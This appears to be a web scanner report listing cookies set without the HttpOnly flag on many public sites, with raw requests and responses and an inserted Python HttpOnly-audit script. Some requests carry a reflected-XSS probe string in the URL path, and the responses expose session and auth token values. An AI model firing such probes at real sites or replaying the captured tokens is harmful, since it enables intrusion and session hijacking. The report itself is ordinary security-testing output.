HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:32:35 GMT Server: Apache X-Powered-By: PHP/5.2.8 Vary: Cookie X-Pingback: http://videos.smartdesis.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: PHPSESSID=d63972255e4dc639aef9ed15da38a8a8; path=/ Last-Modified: Thu, 03 Feb 2011 20:32:35 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 395
<div id="content">
<div class="post"> <h2>Error 404 - Not Found</h2>
<div class="entry"> <p>Sorry, the page that you are looking for does not exist.</p> </div><!--/entr ...[SNIP]...
The following cookies were issued by the application and do not have the HttpOnly flag set:
session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=176-9787580-1042565; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /SmartDraw-com-SDS11-SmartDraw-2010/dp/B002OG5QUC/x22 HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:21 GMT
Server: Server
x-amz-id-1: 1KMV2BXDN94S7KQ0JZ7S
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: q5mVjA3yFvZi2IuxLAukAm69vnbnuFICbsgIGuLZMtThRGfrgK3+KrMswERBq2Ak
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=176-9787580-1042565; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 350615
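The finding above is the same one repeated for every host in this section: a cookie issued without the HttpOnly flag, rated higher when its name suggests a session identifier. As an added example (not part of the scanner's report or its code), the Python below performs that check over raw responses. It pulls every Set-Cookie header regardless of header-name case (the Amazon response writes "Set-cookie"), parses cookie attributes case-insensitively (the directorystore.com NetScaler cookie writes "httponly"), and classifies the cookie name against a list of platform default session-cookie names. The sample response and header values are constructed from responses quoted in this section; the name list (which also includes ASP.NET_SessionId, not seen here), the anchored patterns and the severity labels are assumptions, not the scanner's logic.

```python
"""Audit Set-Cookie headers for HttpOnly and flag likely session tokens.
Added example, not part of the scan report. Sample data is constructed from
responses quoted there; the session-cookie name list is an assumption."""
import re
from dataclasses import dataclass, field

# Constructed sample: a trimmed copy of one response quoted in the report.
# Header names are case-insensitive; a check that greps only "Set-Cookie"
# would miss both cookies in this "Set-cookie" response.
SAMPLE_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Date: Thu, 03 Feb 2011 21:48:21 GMT\r\n"
    "Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; "
    "expires=Tue Jan 01 08:00:01 2036 GMT\r\n"
    "Set-cookie: session-id=176-9787580-1042565; path=/; domain=.amazon.com; "
    "expires=Tue Jan 01 08:00:01 2036 GMT\r\n"
    "Content-Length: 350615\r\n"
    "\r\n"
    "<html>...</html>"
)

# Constructed sample: Set-Cookie values copied from other responses in the
# report. Only the NetScaler NSC_ cookie carries httponly.
SAMPLE_SET_COOKIE_HEADERS = [
    "PHPSESSID=4c1e6e6a8f7ca1c6adde18d7254993a5; path=/",
    "ASPSESSIONIDQSCCAAQS=KOLLNFNAIMDDAJHLAICANGDC; path=/",
    "JSESSIONID=aEIjMQSaeS8g; path=/",
    "NSC_xxx-ejsfdupsztupsf=ffffffff9482e55245525d5f4f58455e445a4a423660;"
    "expires=Thu, 03-Feb-2011 19:27:11 GMT;path=/;httponly",
    "CFID=56399166;expires=Sat, 26-Jan-2041 20:27:36 GMT;path=/",
    "visit=G; Expires=Tue, 21-Feb-2079 23:40:25 GMT; Path=/",
]

# Assumption: platform default session-cookie names (PHP, classic ASP, ASP.NET,
# Java servlet containers, ColdFusion, Amazon's session-id). Anchored with $
# so that "session-id-time" (a timestamp) is not mistaken for "session-id".
SESSION_NAME_PATTERNS = [
    re.compile(r"^PHPSESSID$", re.I),
    re.compile(r"^ASPSESSIONID[A-Z]*$", re.I),
    re.compile(r"^ASP\.NET_SessionId$", re.I),
    re.compile(r"^JSESSIONID$", re.I),
    re.compile(r"^CF(ID|TOKEN)$", re.I),
    re.compile(r"^session[-_]?id$", re.I),
]


@dataclass
class Cookie:
    name: str
    value: str
    attributes: dict = field(default_factory=dict)  # lower-cased name -> value or True

    @property
    def httponly(self) -> bool:
        return "httponly" in self.attributes


def parse_set_cookie(header_value: str) -> Cookie:
    """Parse one Set-Cookie value; attribute names compare case-insensitively."""
    parts = [p.strip() for p in header_value.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if part:
            key, sep, val = part.partition("=")
            attrs[key.strip().lower()] = val.strip() if sep else True
    return Cookie(name.strip(), value.strip(), attrs)


def extract_set_cookie_headers(raw_response: str) -> list:
    """Return the value of every Set-Cookie header in a raw HTTP response."""
    head = re.split(r"\r?\n\r?\n", raw_response, maxsplit=1)[0]
    values = []
    for line in head.splitlines()[1:]:  # skip the status line
        key, sep, val = line.partition(":")
        if sep and key.strip().lower() == "set-cookie":
            values.append(val.strip())
    return values


def looks_like_session_token(cookie: Cookie) -> bool:
    return any(p.match(cookie.name) for p in SESSION_NAME_PATTERNS)


def audit(header_values: list) -> list:
    """One finding per cookie set without HttpOnly. A likely session token is
    rated higher: without HttpOnly, script injected via XSS can read it from
    document.cookie and replay the session."""
    findings = []
    for value in header_values:
        cookie = parse_set_cookie(value)
        if cookie.httponly:
            continue
        session = looks_like_session_token(cookie)
        findings.append({"name": cookie.name, "session_token": session,
                         "severity": "medium" if session else "low"})
    return findings
```

Calling `audit(extract_set_cookie_headers(SAMPLE_RESPONSE))` yields two findings, with only `session-id` marked as a session token: the anchored pattern treats `session-id-time` as the timestamp it is, which is narrower than the report above, where both Amazon cookies are described as session tokens. Over `SAMPLE_SET_COOKIE_HEADERS` the NSC_ cookie is skipped because it carries `httponly`, and `visit=G` is reported at low severity.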
The following cookies were issued by the application and do not have the HttpOnly flag set:
session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
session-id=183-0423924-6403059; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /s/ HTTP/1.1
Host: www.amazon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:48:21 GMT
Server: Server
x-amz-id-1: 1B5Q0P8RKVGQFA9NY3SE
p3p: policyref="http://www.amazon.com/w3c/p3p.xml",CP="CAO DSP LAW CUR ADM IVAo IVDo CONo OTPo OUR DELi PUBi OTRi BUS PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA HEA PRE LOC GOV OTC "
x-amz-id-2: nI6zZw+w2fEj6f+WxBnPsVapnrhlNWadEc8XUA04/cH3a6X/znrumVfUTZLfgypT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=ISO-8859-1
Set-cookie: session-id-time=2082787201l; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Set-cookie: session-id=183-0423924-6403059; path=/; domain=.amazon.com; expires=Tue Jan 01 08:00:01 2036 GMT
Content-Length: 83315
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: www.atlastravelweb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68752
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDQSCCAAQS=KOLLNFNAIMDDAJHLAICANGDC; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 21:48:28 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQQCTAQA=KHEEKNBBHJMPFGDEDDNMBPHF; __utmz=252525594.1296786866.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=252525594.371918977.1296786866.1296786866.1296786866.1; __utmc=252525594; __utmb=252525594.1.10.1296786866
Response
HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:00:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 15367
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=PLLOGJOBELDIIOJMCOMKFGEL; path=/
Cache-control: private
<html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>Bizfind - PORTAL OF USA COMPANIES</title> <meta name="descrip ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /15/182221/abc-development-inc/chicago.aspx/x22 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 21:48:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11262
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=MBEEKNBBLDIKBKLLPOJKBBJH; path=/
Cache-control: private
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /15/182221/abc-development-inc/chicago.aspx/x22 HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQQCTAQA=KHEEKNBBHJMPFGDEDDNMBPHF; __utmz=252525594.1296786866.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=252525594.371918977.1296786866.1296786866.1296786866.1; __utmc=252525594; __utmb=252525594.1.10.1296786866
Response
HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:00:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11262
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=FHLOGJOBGLJDLKGKDICEMEGL; path=/
Cache-control: private
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us
Response
HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 18:00:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11710
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=HHLOGJOBEBKFBOBPFALAANON; path=/
Cache-control: private
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us
Response
HTTP/1.1 200 OK
Date: Fri, 04 Feb 2011 02:35:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11710
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=GNNNLNBBCDCJFMEMFLPKHOHL; path=/
Cache-control: private
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Host: www.bizfind.us
Proxy-Connection: Keep-Alive
Response
HTTP/1.1 301 Moved Permanently
Date: Fri, 04 Feb 2011 02:36:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Location: http://www.bizfind.us
Content-Length: 0
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=CBONLNBBJDMBAKPEBCOICOPH; path=/
Cache-control: private
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /favicon.ico HTTP/1.1
Host: www.bizfind.us
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQQCTAQA=KHEEKNBBHJMPFGDEDDNMBPHF; __utmz=252525594.1296786866.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=252525594.371918977.1296786866.1296786866.1296786866.1; __utmc=252525594; __utmb=252525594.1.10.1296786866
Response
HTTP/1.1 301 Moved Permanently
Date: Fri, 04 Feb 2011 18:00:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Location: http://www.bizfind.us
Content-Length: 0
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=AKLOGJOBBOAKPBCKBPLDNKNG; path=/
Cache-control: private
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=aEIjMQSaeS8g; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: www.boldchat.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Resin/2.1.13
Cache-Control: private
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://images.boldchat.com/w3c/p3p.xml"
Set-Cookie: JSESSIONID=aEIjMQSaeS8g; path=/
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 19:19:32 GMT
Content-Length: 37731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Cont ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?src=tcv3video HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /tutorials.html HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: www.descargargratis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: www.directorystore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:19:36 GMT
Set-Cookie: JSESSIONID=NK1LJBxvx22f1j4q4lQ7pLGn81QPQXGTkSvkdtZp1Gfp3kNQJx9t!1845141040!-904548398; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Server: Unspecified
Set-Cookie: NSC_xxx-ejsfdupsztupsf=ffffffff9482e55245525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 19:27:11 GMT;path=/;httponly
Content-Length: 29576
<html > <head>
<title>Directorystore.com - Directorystore.com - Worldwide Directory Source</title> <!-- BEGIN metainfo Include --> <meta http-equ ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1
Host: www.expertrating.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 21:49:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 34238
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQQAAATSB=HNEHKCKAPEKPJKCMAAKCHOBB; path=/
Cache-control: private
<html> <head> <meta HTTP-EQUIV="Expires" CONTENT="Wed, 10 Jan 2000 01:01:01 GMT"> <meta name="keywords" content="Online certification, Pre employment testing, Online courses, Online testing, Sk ...[SNIP]...
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: www.gambleaware.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /gallery/postcards.php HTTP/1.1
Host: www.ksbe.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /wholesale/golf-clubs.html HTTP/1.1
Host: www.linkchina.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pub/troy-brown/07/287/56A/x22 HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID="ajax:6393265550819748814"; Version=1; Path=/
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Set-Cookie: leo_auth_token="GST:8umv_nS7XFzUyxeKwcm4-54LG5Af_dxZBECJyfS9zSz2oe7lnSRZnR:1296764778:7cadffe11cc6d886b438c64892ac7c2f8d826bc7"; Version=1; Max-Age=1799; Expires=Thu, 03-Feb-2011 20:56:17 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: visit=G; Expires=Tue, 21-Feb-2079 23:40:25 GMT; Path=/
Set-Cookie: bcookie="v=1&b190bc23-5ec6-4de1-a9c4-5a80edfac251"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 23:40:25 GMT; Path=/
Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/
Location: http://www.linkedin.com/pub/troy-brown/7/287/56a
Content-Language: en-US
Content-Length: 0
Date: Thu, 03 Feb 2011 20:26:18 GMT
X-Cache: MISS from www.linkedin.com
X-Cache-Lookup: MISS from www.linkedin.com:8080
Via: 1.0 www.linkedin.com (squid/3.0.STABLE20)
Connection: keep-alive
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /shareArticle HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: leo_auth_token="GST:ZvpYDWFtWOPUWYjh_jHyedipSluAqpcn6vhruIXa2CDdWVdPpP66g5:1296760855:7d27a506e0853359e3965f871f95b1bfef8c45d6"; Version=1; Max-Age=1799; Expires=Thu, 03-Feb-2011 19:50:54 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID="ajax:0561599565067721010"; Version=1; Path=/
Set-Cookie: visit=G; Expires=Tue, 21-Feb-2079 22:35:02 GMT; Path=/
Set-Cookie: bcookie="v=1&695a9322-0059-4252-9172-662df4a2e00f"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Tue, 21-Feb-2079 22:35:02 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 7453
Date: Thu, 03 Feb 2011 19:20:54 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965045525d5f4f58455e445a4a42198c;expires=Thu, 03-Feb-2011 19:51:08 GMT;path=/;httponly
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search/company.cfm HTTP/1.1
Host: www.macraesbluebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=UTF-8
Location: /index.cfm
Server: Microsoft-IIS/7.5
Set-Cookie: CFID=56399166;expires=Sat, 26-Jan-2041 20:27:36 GMT;path=/
Set-Cookie: CFTOKEN=20340254;expires=Sat, 26-Jan-2041 20:27:36 GMT;path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:27:35 GMT
Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1
Host: www.made-in-china.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /c/mm49ryk/a-b-c-development-company-inc/x22 HTTP/1.1
Host: www.manta.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /c/mm8136k/abc-development-inc/x22 HTTP/1.1
Host: www.manta.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /Modules/PostTo/Pages/ HTTP/1.1
Host: www.myspace.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="/auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fu%3dhttp%253a%252f%252f ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /productxml/?QuickList=1&ProductURL=Y&ShortName=Y&keywords=12370379&ThumbnailURL=Y HTTP/1.1
Host: www.overstock.com
Proxy-Connection: keep-alive
Referer: http://s0.2mdn.net/1787227/3-inBannerVideo2011_ViPrPf_New.swf?clickTag=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3aa3%2F3%2F0%2F%252a%2Ff%253B234670317%253B0-0%253B0%253B58524542%253B4307-300%2F250%253B40113270%2F40131057%2F2%253Bu%253D%252Clb-1482036_1296770433%252C11d765b6a10b1b3%252Cnone%252Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%253B%257Efdr%253D234572024%253B0-0%253B0%253B32934908%253B4307-300%2F250%253B40173662%2F40191449%2F1%253Bu%253D%252Clb-1482036_1296770433%252C11d765b6a10b1b3%252Cnone%252Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%253B%257Esscs%253D%253f&xmlFile=InBannerVideo_ViPrPf_LongboardVA_ronQ1.xml&taxonomyId=2&taxonomyType=sto&productCID=654321&keywords=&skus=12370379|12958970|11254000|12370390|10927901|11915556|13002490|10738953|12970899|12532546|12130097|12753446|11551645|066987|11144650|10355113|13197342|12941235|12370383|12978335|12453900
Accept: */*
